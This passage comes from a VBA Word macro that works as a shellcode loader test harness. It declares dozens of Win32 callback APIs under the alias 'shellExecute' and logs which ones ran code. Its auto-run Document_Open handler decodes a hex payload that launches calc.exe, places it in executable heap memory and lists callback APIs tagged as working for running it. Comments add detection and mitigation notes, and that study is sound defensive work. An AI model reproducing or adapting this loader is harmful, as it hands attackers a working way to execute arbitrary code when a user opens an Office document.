shellExecute Lib "user32" Alias "DialogBoxIndirectParamW" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 39 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoA" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As Any, ByVal CalType As Any) As Long 40 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As Any, ByVal CalType As Any) As Long 41 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsA" (ByVal lpDateFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 42 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpDateFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 43 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopWindows" (ByVal hDesktop As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long 44 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsA" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 45 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsW" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 46 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesA" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 47 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesW" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 48 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumPropsExA" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long 49 | 'Private Declare Function shellExecute Lib "user32" 
Alias "EnumPropsExW" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long 50 | 'Private Declare Function shellExecute Lib "powrprof" Alias "EnumPwrSchemes" (ByVal lpfnPwrSchemesEnumProc As Any, ByVal lParam As Any) As Long 51 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 52 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 53 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 54 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 55 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesA" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long 56 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long 57 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsA" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 58 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsW" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 59 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesA" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long 60 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesW" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long 61 | 'Private Declare Function shellExecute Lib "user32" Alias 
"EnumThreadWindows" (ByVal dwThreadId As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long 62 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsA" (ByVal lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 63 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsW" (ByVal lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long 64 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesA" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 65 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long 66 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsA" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 67 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsW" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 68 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindows" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 69 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModules" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long 70 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesEx" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long 71 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesExW" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long 72 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringA" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal 
nHeight As Any) As Long 73 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringW" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal nHeight As Any) As Long 74 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyIpInterfaceChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long 75 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyTeredoPortChange" (ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long 76 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyUnicastIpAddressChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long 77 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThread" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal dwFlags As Any, ByVal pfnCallback As Any) As Long 78 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThreadWithHandle" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal flags As Any, ByVal pfnCallback As Any, ByVal pHandle As Any) As Long 79 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackA" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long 80 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackW" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long 81 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWinEventHook" (ByVal eventMin As Any, ByVal eventMax As Any, ByVal hmodWinEventProc As Any, ByVal 
lpfnWinEventProc As Any, ByVal idProcess As Any, ByVal idThread As Any, ByVal dwflags As Any) As Long 82 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExA" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long 83 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExW" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long 84 | 85 | ' ################## 86 | ' FAILED FUNCTIONS # 87 | ' ################## 88 | 89 | 'Private Declare Function shellExecute Lib "clusapi" Alias "AddClusterNode" (ByVal hCluster As Any, ByVal lpszNodeName As Any, ByVal pfnProgressCallBack As Any, ByVal pvCallbackArg As Any) As Long 90 | 'Private Declare Function shellExecute Lib "bthprops" Alias "BluetoothRegisterForAuthentication" (ByVal pbtdi As Any, ByVal phRegHandle As Any, ByVal pfnCallback As Any, ByVal pvParam As Any) As Long 91 | 'Private Declare Function shellExecute Lib "icm32" Alias "CMTranslateRGBsExt" (ByVal hcmTransform As Any, ByVal lpSrcBits As Any, ByVal bmInput As Any, ByVal dwWidth As Any, ByVal dwHeight As Any, ByVal dwInputStride As Any, ByVal lpDestBits As Any, ByVal bmOutput As Any, ByVal dwOutputStride As Any, ByVal lpfnCallback As Any, ByVal ulCallbackData As Any) As Long 92 | 'Private Declare Function shellExecute Lib "clusapi" Alias "CreateCluster" (ByVal pConfig As Any, ByVal pfnProgressCallBack As Any, ByVal pvCallbackArg As Any) As Long 93 | 'Private Declare Function shellExecute Lib "user32" Alias "CreateDialogIndirectParamA" (ByVal hInstance As Any, ByVal lpTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal lParamInit As Any) As Long 94 | 'Private Declare Function shellExecute Lib "user32" Alias "CreateDialogIndirectParamW" (ByVal hInstance As Any, ByVal lpTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal lParamInit As Any) As Long 95 | 'Private Declare Function shellExecute Lib 
"user32" Alias "CreateDialogParamA" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 96 | 'Private Declare Function shellExecute Lib "user32" Alias "CreateDialogParamW" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 97 | 'Private Declare Function shellExecute Lib "spoolss" Alias "CreatePrintAsyncNotifyChannel" (ByVal pName As Any, ByVal pSchema As Any, ByVal filter As Any, ByVal directionality As Any, ByVal pCallback As Any, ByVal ppChannel As Any) As Long 98 | 'Private Declare Function shellExecute Lib "kernel32" Alias "CreateTimerQueueTimer" (ByVal phNewTimer As Any, ByVal TimerQueue As Any, ByVal Callback As Any, ByVal Parameter As Any, ByVal DueTime As Any, ByVal Period As Any, ByVal Flags As Any) As Long 99 | 'Private Declare Function shellExecute Lib "davcint" Alias "DavRegisterAuthCallback" (ByVal Callback As Any, ByVal Version As Any) As Long 100 | 'Private Declare Function shellExecute Lib "clusapi" Alias "DestroyCluster" (ByVal hCluster As Any, ByVal pfnProgressCallback As Any, ByVal pvCallbackArg As Any, ByVal fdeleteVirtualComputerObjects As Any) As Long 101 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxParamA" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 102 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxParamW" (ByVal hInstance As Any, ByVal lpTemplateName As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 103 | 'Private Declare Function shellExecute Lib "user32" Alias "DrawStateA" (ByVal hdc As Any, ByVal hbr As Any, ByVal lpOutputFunc As Any, ByVal lData As Any, ByVal wData As Any, ByVal x As Any, ByVal y As Any, ByVal cx As Any, ByVal cy As Any, ByVal fuFlags As Any) As Long 104 | 
'Private Declare Function shellExecute Lib "user32" Alias "DrawStateW" (ByVal hdc As Any, ByVal hbr As Any, ByVal lpOutputFunc As Any, ByVal lData As Any, ByVal wData As Any, ByVal x As Any, ByVal y As Any, ByVal cx As Any, ByVal cy As Any, ByVal fuFlags As Any) As Long 105 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumChildWindows" (hWndParent As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 106 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumEnhMetaFile" (ByVal hdc As Any, ByVal hemf As Any, ByVal lpEnhMetaFunc As Any, ByVal lpData As Any, ByVal lpRect As Any) As Long 107 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesA" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamProc As Any, ByVal lParam As Any) As Long 108 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesW" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamProc As Any, ByVal lParam As Any) As Long 109 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesExA" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamExProc As Any, ByVal lParam As Any, ByVal dwFlags As Any) As Long 110 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontFamiliesExW" (ByVal hdc As Any, ByVal lpszFamily As Any, ByVal lpEnumFontFamExProc As Any, ByVal lParam As Any, ByVal dwFlags As Any) As Long 111 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontsA" (ByVal hdc As Any, lpFaceName As Any, ByVal lpFontFunc As Any, ByVal lParam As Any) As Long 112 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumFontsW" (ByVal hdc As Any, lpFaceName As Any, ByVal lpFontFunc As Any, ByVal lParam As Any) As Long 113 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumICMProfilesA" (ByVal hdc As Any, ByVal lpEnumICMProfilesFunc As Any, ByVal lParam As Any) As Long 114 | 'Private Declare Function shellExecute Lib "gdi32" Alias 
"EnumICMProfilesW" (ByVal hdc As Any, ByVal lpEnumICMProfilesFunc As Any, ByVal lParam As Any) As Long 115 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumMetaFile" (ByVal hdc As Any, ByVal hmf As Any, ByVal lpMetaFunc As Any, ByVal lParam As Any) As Long 116 | 'Private Declare Function shellExecute Lib "gdi32" Alias "EnumObjects" (ByVal hdc As Any, ByVal nObjectType As Any, ByVal lpObjectFunc As Any, ByVal lParam As Any) As Long 117 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesA" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 118 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesW" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 119 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesExA" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 120 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceLanguagesExW" (ByVal hModule As Any, ByVal lpType As Any, ByVal lpName As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, byval dwFlags as Any, byval LangId as Any) As Long 121 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesA" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 122 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesW" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long 123 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesExA" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 124 | 
'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceNamesExW" (ByVal hModule As Any, ByVal lpszType As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long 125 | 'Private Declare Function shellExecute Lib "advapi32" Alias "EventRegister" (ByVal ProviderId As Any, ByVal EnableCallback As Any, ByVal CallbackContext As Any, ByVal RegHandle As Any) As Long 126 | 'Private Declare Function shellExecute Lib "kernel32" Alias "GetApplicationRecoveryCallback" (ByVal hProcess As Any, ByVal pRecoveryCallback As Any, ByVal ppvParameter As Any, ByVal pdwPingInterval As Any, ByVal pdwFlags As Any) As Long 127 | 'Private Declare Function shellExecute Lib "gdi32" Alias "LineDDA" (ByVal nXStart As Any, ByVal nYStart As Any, ByVal nXEnd As Any, ByVal nYEnd As Any, ByVal lpLineFunc As Any, ByVal lpData As Any) As Long 128 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyStableUnicastIpAddressTable" (ByVal Family As Any, ByVal Table As Any, ByVal CallerCallback As Any, ByVal CallerContext As Any, ByVal NotificationHandle As Any) As Long 129 | 'Private Declare Function shellExecute Lib "advapi32" Alias "PerfStartProvider" (ByVal ProviderGuid As Any, ByVal ControlCallback As Any, ByVal phProvider As Any) As Long 130 | 'Private Declare Function shellExecute Lib "advapi32" Alias "ReadEncryptedFileRaw" (ByVal pfExportCallback As Any, ByVal pvCallbackContext As Any, ByVal pvContext As Any) As Long 131 | 'Private Declare Function shellExecute Lib "kernel32" Alias "RegisterApplicationRecoveryCallback" (ByVal pRecoveryCallback As Any, ByVal pvParameter As Any, ByVal dwPingInterval As Any, ByVal dwFlags As Any) As Long 132 | 'Private Declare Function shellExecute Lib "spoolss" Alias "RegisterForPrintAsyncNotifications" (ByVal pName As Any, ByVal pSchema As Any, ByVal filter As Any, ByVal directionality As Any, ByVal pCallback As Any, ByVal pRegistrationHandler As Any) As Long 133 | 'Private Declare Function 
shellExecute Lib "advapi32" Alias "RegisterServiceCtrlHandlerExA" (ByVal lpServiceName As Any, ByVal lpHandlerProc As Any, ByVal lpContext As Any) As Long 134 | 'Private Declare Function shellExecute Lib "advapi32" Alias "RegisterServiceCtrlHandlerExW" (ByVal lpServiceName As Any, ByVal lpHandlerProc As Any, ByVal lpContext As Any) As Long 135 | 'Private Declare Function shellExecute Lib "kernel32" Alias "RegisterWaitForSingleObject" (ByVal phNewWaitObject As Any, ByVal hObject As Any, ByVal Callback As Any, ByVal Context As Any, ByVal dwMilliseconds As Any, ByVal dwFlags As Any) As Long 136 | 'Private Declare Function shellExecute Lib "kernel32" Alias "SetTimerQueueTimer" (ByVal phNewTimer As Any, ByVal TimerQueue As Any, ByVal Callback As Any, ByVal Parameter As Any, ByVal DueTime As Any, ByVal Period As Any, ByVal Flags As Any) As Long 137 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumLines" (ByVal hProcess As Any, ByVal Base As Any, ByVal Obj As Any, ByVal File As Any, ByVal EnumLinesCallback As Any, ByVal UserContext As Any) As Long 138 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumLinesW" (ByVal hProcess As Any, ByVal Base As Any, ByVal Obj As Any, ByVal File As Any, ByVal EnumLinesCallback As Any, ByVal UserContext As Any) As Long 139 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumProcesses" (ByVal EnumProcessesCallback As Any, ByVal UserContext As Any) As Long 140 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumSourceLines" (ByVal hProcess As Any, ByVal Base As Any, ByVal Obj As Any, ByVal File As Any, ByVal Line As Any, ByVal Flags As Any, ByVal EnumLinesCallback As Any, ByVal UserContext As Any) As Long 141 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "SymEnumSymbols" (ByVal hProcess As Any, ByVal BaseOfDll As Any, ByVal Mask As Any, ByVal EnumSymbolsCallback As Any, ByVal UserContext As Any) As Long 142 | 'Private Declare Function shellExecute Lib 
"mscms" Alias "TranslateBitmapBits" (ByVal hColorTransform As Any, ByVal pSrcBits As Any, ByVal bmInput As Any, ByVal dwWidth As Any, ByVal dwHeight As Any, ByVal dwInputStride As Any, ByVal pDestBits As Any, ByVal bmOutput As Any, ByVal dwOutputStride As Any, ByVal pfnCallback As Any, ByVal ulCallbackData As Any) As Long 143 | 'Private Declare Function shellExecute Lib "ws2spi" Alias "WPUQueryBlockingCallback" (ByVal dwCatalogEntryId As Any, ByVal lplpfnCallback As Any, ByVal lpdwContext As Any, ByVal lpErrno As Any) As Long 144 | 'Private Declare Function shellExecute Lib "wdsclientapi" Alias "WdsCliTransferFile" (ByVal pwszServer As Any, ByVal pwszNamespace As Any, ByVal pwszRemoteFilePath As Any, ByVal pwszLocalFilePath As Any, ByVal dwFlags As Any, ByVal dwReserved As Any, ByVal pfnWdsCliCallback As Any, ByVal pvUserData As Any, ByVal phTransfer As Any) As Long 145 | 'Private Declare Function shellExecute Lib "wlanapi" Alias "WlanRegisterNotification" (ByVal hClientHandle As Any, ByVal dwNotifSource As Any, ByVal bIgnoreDuplicate As Any, ByVal funcCallback As Any, ByVal pCallbackContext As Any, ByVal pReserved As Any, ByVal pdwdPrevNotifSource As Any) As Long 146 | 'Private Declare Function shellExecute Lib "advapi32" Alias "WriteEncryptedFileRaw" (ByVal pfImportCallback As Any, ByVal pvCallbackContext As Any, ByVal pvContext As Any) As Long 147 | 'Private Declare Function shellExecute Lib "webservices" Alias "WsPullBytes" (ByVal writer As Any, ByVal callback As Any, ByVal callbackState As Any, ByVal error As Any) As Long 148 | 'Private Declare Function shellExecute Lib "winmm" Alias "mciSetYieldProc" (ByVal IDDevice As Any, ByVal yp As Any, ByVal dwYieldData As Any) As Long 149 | 'Private Declare Function shellExecute Lib "winmm" Alias "midiInOpen" (ByVal lphMidiIn As Any, ByVal uDeviceID As Any, ByVal dwCallback As Any, ByVal dwCallbackInstance As Any, ByVal dwFlags As Any) As Long 150 | 151 | ' ############### 152 | ' # MACRO START # 153 | ' ############### 
' Document_Open is the Word event handler that runs when the document is opened
' with macros enabled. In these notes it is the author's test harness:
'   1. decode the hex string in shellCode into byteArray,
'   2. obtain a memory region (active form: an executable heap, see below),
'   3. copy the bytes into that region,
'   4. hand the region's address to ONE Win32 API that takes a callback pointer
'      (whichever shellExecute line is uncommented).
' As listed here every shellExecute line is commented out, so the Sub ends after
' step 3. The Stop statements suspend execution in the VBA editor between stages.
'
' allocateMemory / createMemory / copyMemory / shellExecute and the get*Handle
' helpers are bound by Declare statements earlier in the file (not shown in this
' block); the argument lists used below have to match whichever Declare is active.
'
' Detection / mitigation view: what the Office process exhibits here is an
' auto-run macro with Win32 Declare imports, a heap created with
' HEAP_CREATE_ENABLE_EXECUTE (or a PAGE_EXECUTE_READWRITE allocation in the
' commented alternative), a write into that region, and a callback-taking API
' given a pointer into it. Blocking macros in untrusted documents and the
' Microsoft Defender attack surface reduction rule "Block Win32 API calls from
' Office macros" both act on the first of those stages.
Private Sub Document_Open()

    Stop

    ' #####################
    ' # Declare Variables #
    ' #####################

    Dim shellCode As String

    Dim shellLength As Byte
    Dim byteArray() As Byte

    Dim memoryAddress As Long

    Dim windowHandle As Long
    Dim ProcessHandle As Long
    Dim threadHandle As Long
    Dim moduleHandle As Long

    ' zL and oL are the constants 0 and 1 used as filler arguments in the calls
    ' below; rL is scratch (heap handle in the active path, other values in the
    ' commented experiments).
    Dim zL As Long
    Dim oL As Long
    Dim rL As Long

    zL = 0
    oL = 1

    ' Handles fed to the APIs that need one. The helpers are declared outside
    ' this block; presumably thin aliases for the matching Win32 getters - confirm
    ' against the Declare section.
    windowHandle = getWindowHandle()
    ProcessHandle = getProcessHandle()
    threadHandle = getThreadHandle()
    moduleHandle = getModuleHandle(vbNullString)

    ' #############
    ' # Shellcode #
    ' #############

    ' Hex-encoded test payload. The trailing bytes 63616c632e65786500 are the
    ' ASCII string "calc.exe" plus a NUL terminator.
    shellCode = "fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d6a018d85b90000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500"

    ' ##############
    ' # Byte Array #
    ' ##############

    ' Two hex characters encode one byte.
    shellLength = Len(shellCode) / 2

    ' Bounds 0..shellLength give shellLength + 1 elements; the last one is never
    ' assigned by the loop below and stays 0.
    ReDim byteArray(0 To shellLength)

    ' ###############################
    ' # Convert Hex String to Bytes #
    ' ###############################

    For i = 0 To shellLength - 1

        ' pos is the 1-based offset of byte i's first hex digit. Both branches
        ' agree for i = 0 (i * 2 + 1 is also 1).
        If i = 0 Then
            pos = i + 1
        Else
            pos = i * 2 + 1
        End If
        Value = Mid(shellCode, pos, 2)
        ' Val parses the "&H"-prefixed pair as a hexadecimal number.
        byteArray(i) = Val("&H" & Value)

    Next

    ' ###################
    ' # Allocate Memory #
    ' ###################

    Stop

    ' Three allocation variants were tried; only the heap variant is active.
    ' Each one requests memory that is writable and executable at the same time.

    ' flAllocationType 0x1000 = MEM_COMMIT
    ' flProtect 0x40 = PAGE_EXECUTE_READWRITE
    'memoryAddress = allocateMemory(zL, &H5000, &H1000, &H40) ' WORK VirtualAlloc

    'memoryAddress = allocateMemory(ByVal -1, rL, zL, &H5000, &H1000, &H40) ' WORK NtAllocateVirtualMemory / ZwAllocateVirtualMemory
    'memoryAddress = rL

    ' flOptions 0x40000 = HEAP_CREATE_ENABLE_EXECUTE
    ' rL receives the handle of the new heap; the &H5000-byte block is then
    ' allocated from it.
    rL = createMemory(&H40000, zL, zL)
    memoryAddress = allocateMemory(rL, zL, &H5000) ' WORK HeapAlloc

    ' #############################
    ' # Write Shellcode to Memory #
    ' #############################

    Stop

    'copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1 ' WORK RtlMoveMemory

    ' Active form is the five-argument WriteProcessMemory call. -1 is the
    ' current-process pseudo-handle, so the write lands in the host process
    ' itself. UBound(byteArray) + 1 also copies the unassigned last element.
    copyMemory ByVal -1, memoryAddress, VarPtr(byteArray(0)), UBound(byteArray) + 1, zL ' WORK WriteProcessMemory

    ' #####################
    ' # Execute Shellcode #
    ' #####################

    ' Debug aid: show the region's address in hex.
    'MsgBox (Hex(memoryAddress))

    Stop

    ' The two lists below are the author's test log, one line per API. Each line
    ' passes memoryAddress in the position of that API's callback parameter. The
    ' tag before the API name is the recorded result: WORK and FAIL as named;
    ' NODLL, CANTFIND, NOFUNC and ERRBADCALL are not defined on this page and
    ' presumably record load or call errors.
    ' For detection coverage, the WORK list names the callback-taking APIs the
    ' author saw transfer control to the region.

    ' #####################
    ' # WORKING FUNCTIONS #
    ' #####################

    'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL) ' WORK CallWindowProcA
    'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL) ' WORK CallWindowProcW
    'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL) ' WORK DialogBoxIndirectParamA
    'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL) ' WORK DialogBoxIndirectParamW
    'rL = 3072 ' LOCALE_CUSTOM_DEFAULT
    'executeResult = shellExecute(memoryAddress, rL, oL, oL) ' WORK EnumCalendarInfoA
    'rL = 3072 ' LOCALE_CUSTOM_DEFAULT
    'executeResult = shellExecute(memoryAddress, rL, oL, oL) ' WORK EnumCalendarInfoW
    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumDateFormatsA
    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumDateFormatsW
    'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumDesktopWindows
    'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumDesktopsA
    'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumDesktopsW
    'executeResult = shellExecute(memoryAddress, oL, zL, zL) ' WORK EnumLanguageGroupLocalesA
    'executeResult = shellExecute(memoryAddress, oL, zL, zL) ' WORK EnumLanguageGroupLocalesW
    'executeResult = shellExecute(windowHandle, memoryAddress) ' WORK EnumPropsExA
    'executeResult = shellExecute(windowHandle, memoryAddress) ' WORK EnumPropsExW
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumPwrSchemes
    'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumResourceTypesA
    'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumResourceTypesW
    'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL) ' WORK EnumResourceTypesExA
    'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL) ' WORK EnumResourceTypesExW
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemCodePagesA
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemCodePagesW
    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumSystemLanguageGroupsA
